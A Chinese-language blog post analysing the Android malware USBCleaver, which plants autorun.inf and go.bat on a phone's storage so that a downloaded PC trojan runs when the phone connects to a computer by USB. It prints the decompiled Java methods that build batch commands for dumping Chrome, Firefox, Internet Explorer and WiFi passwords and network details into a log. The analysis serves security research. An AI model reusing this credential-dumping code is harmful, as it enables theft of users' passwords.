本文章由Jack_Jia编写,转载请注明出处。
文章链接:http://blog.csdn.net/jiazhijun/article/details/9179749
作者:Jack_Jia 邮箱:309zhijun@163.com
一、病毒样本基本信息
Md5:283d16309a5a35a13f8fa4c5e1ae01b1
Package:com.novaspirit.usbcleaver
二、病毒代码分析
1、查看AndroidMainfest.xml文件
![](https://img-blog.csdn.net/20130626155053437?watermark/2/text/aHR0cDovL2Jsb2cuY3Nkbi5uZXQvamlhemhpanVu/font/5a6L5L2T/fontsize/400/fill/I0JBQkFCMA==/dissolve/70/gravity/Center)
由清单文件可以看出,该恶意软件的入口点只有一个.USBCleaverActivity。
2、代码分析流程
代码树结构如下:
![](https://img-blog.csdn.net/20130626155625968?watermark/2/text/aHR0cDovL2Jsb2cuY3Nkbi5uZXQvamlhemhpanVu/font/5a6L5L2T/fontsize/400/fill/I0JBQkFCMA==/dissolve/70/gravity/Center)
经过对程序唯一入口点的分析,恶意代码工作流程如下:
1、点击程序图标后运行USBCleaverActivity组件,该组件主要负责病毒运行环境的创建,如病毒所需目录结构。通过payloadHander完成autorun.inf文件写入(当以USB设备连接PC时,PC根据该文件配置运行go.bat),通过downloader完成对PC木马的下载。
![](https://img-blog.csdn.net/20130626163143828?watermark/2/text/aHR0cDovL2Jsb2cuY3Nkbi5uZXQvamlhemhpanVu/font/5a6L5L2T/fontsize/400/fill/I0JBQkFCMA==/dissolve/70/gravity/Center)
![](https://img-blog.csdn.net/20130626223248671?watermark/2/text/aHR0cDovL2Jsb2cuY3Nkbi5uZXQvamlhemhpanVu/font/5a6L5L2T/fontsize/400/fill/I0JBQkFCMA==/dissolve/70/gravity/Center)
2、downloader类负责PC木马压缩包的下载,下载后通过decompress完成PC木马压缩包解压
![](https://img-blog.csdn.net/20130626163916187?watermark/2/text/aHR0cDovL2Jsb2cuY3Nkbi5uZXQvamlhemhpanVu/font/5a6L5L2T/fontsize/400/fill/I0JBQkFCMA==/dissolve/70/gravity/Center)
下载的PC木马压缩包信息如下:
![](https://img-blog.csdn.net/20130626164341937?watermark/2/text/aHR0cDovL2Jsb2cuY3Nkbi5uZXQvamlhemhpanVu/font/5a6L5L2T/fontsize/400/fill/I0JBQkFCMA==/dissolve/70/gravity/Center)
3、payload通过payloadHandler产生go.bat,go.bat文件在autorun.info中配置运行。
![](https://img-blog.csdn.net/20130626223345953?watermark/2/text/aHR0cDovL2Jsb2cuY3Nkbi5uZXQvamlhemhpanVu/font/5a6L5L2T/fontsize/400/fill/I0JBQkFCMA==/dissolve/70/gravity/Center)
public String dumpChromePassword()
{
this.dumpChromePassword = "ECHO ----------------------------------------------------------------------------------------------------------------------------- >> %log% 2>&1\r\nECHO +----------------------------------+ >> %log% 2>&1\r\nECHO + [Dump Chrome PW] + >> %log% 2>&1\r\nECHO +----------------------------------+ >> %log% 2>&1\r\n.\\ChromePass.exe /stext %tmplog% >> %log% 2>&1\r\nCOPY %log%+%tmplog%* %log% >> NUL\r\nDEL /f /q %tmplog% >NUL\r\n\r\n";
return this.dumpChromePassword;
}
public String dumpFFPassword()
{
this.dumpFFPassword = "ECHO ----------------------------------------------------------------------------------------------------------------------------- >> %log% 2>&1\r\nEcho +----------------------------------+ >> %log% 2>&1\r\nEcho + [Dump Firefox PW] + >> %log% 2>&1\r\nEcho +----------------------------------+ >> %log% 2>&1\r\n%progdir%\\PasswordFox.exe /stext %tmplog% >> %log% 2>&1\r\nCOPY %log%+%tmplog%* %log% >> NUL\r\nDEL /f /q %tmplog% >NUL\r\n\r\n";
return this.dumpFFPassword;
}
public String dumpIEPassword()
{
this.dumpIEPassword = "ECHO ----------------------------------------------------------------------------------------------------------------------------- >> %log% 2>&1\r\nECHO +----------------------------------+ >> %log% 2>&1\r\nECHO + [Dump IE PW] + >> %log% 2>&1\r\nECHO +----------------------------------+ >> %log% 2>&1\r\n.\\iepv.exe /stext %tmplog% >> %log% 2>&1\r\nCOPY %log%+%tmplog%* %log% >> NUL\r\nDEL /f /q %tmplog% >NUL\r\n\r\n";
return this.dumpIEPassword;
}
public String dumpSysInfo()
{
this.dumpSysInfo = "ECHO ----------------------------------------------------------------------------------------------------------------------------- >> %log% 2>&1\r\nECHO +----------------------------------+ >> %log% 2>&1\r\nECHO + [System info] + >> %log% 2>&1\r\nECHO +----------------------------------+ >> %log% 2>&1\r\nIPCONFIG /all >> %log% 2>&1\r\n\r\n";
return this.dumpSysInfo;
}
public String dumpWifiPassword()
{
this.dumpWifiPassword = "ECHO ----------------------------------------------------------------------------------------------------------------------------- >> %log% 2>&1\r\nECHO +----------------------------------+ >> %log% 2>&1\r\nECHO + [Dump WIFI PW] + >> %log% 2>&1\r\nECHO +----------------------------------+ >> %log% 2>&1\r\n.\\WirelessKeyView.exe /stext %tmplog% >> %log% 2>&1\r\nCOPY %log%+%tmplog%* %log% >> NUL\r\nDEL /f /q %tmplog% >NUL\r\n\r\n";
return this.dumpWifiPassword;
}
go.bat文件内容就是执行下载PC木马的执行。到此PC平台木马的运行环境搭建完毕。当手持设备以USB模式连接PC后,PC木马即可成功运行。
三、病毒运行模型及恶意行为
Usbcleaver病毒运行时从服务器下载PC木马压缩包,并解压到SD卡,创建autorun.info和go.bat文件搭建PC木马运行环境。当手持设备以USB设备模式连接电脑后,下载的PC木马能够立即执行。
下载的PC木马能够窃取以下隐私信息:
1、Default gateway
2、DNS
3、Google Chrome password
4、Host name
5、IP address
6、Microsoft Internet Explorer password
7、Mozilla Firefox password
8、Physical address
9、Subnet mask
10、WiFi password
虽然该病毒目前感染量并不大,但是该病毒的运行模式及危害却应该引起安全人员的高度重视。通过移动设备感染PC设备这种方式以前也出现过(
http://blog.csdn.net/jiazhijun/article/details/8649473)。这种跨设备的病毒感染方式相对以前病毒具有更加精准的目的性。
目前短信认证码已经大量运用于电子商务和网银类网站。即使用户通过PC木马窃取了您网站的用户名和密码。但是涉及交易时需要输入动态的短信认证码,PC木马试图侵入到您的手机从而获取短信认证码的难度是相当大的。交易通道和认证信息的“独立双通道”是网上交易安全大大增强。然后如果木马通过感染移动设备,今儿感染用户的PC设备。这样木马就完全控制了用户的交易通道和认证通道,整个交易流程完即刻被木马攻破。
http://www.symantec.com/security_response/writeup.jsp?docid=2013-062010-1818-99
http://news.ccidnet.com/art/1032/20130625/5029495_1.html
本文内容由网友自发贡献,版权归原作者所有,本站不承担相应法律责任。如您发现有涉嫌抄袭侵权的内容,请联系:hwhale#tublm.com(使用前将#替换为@)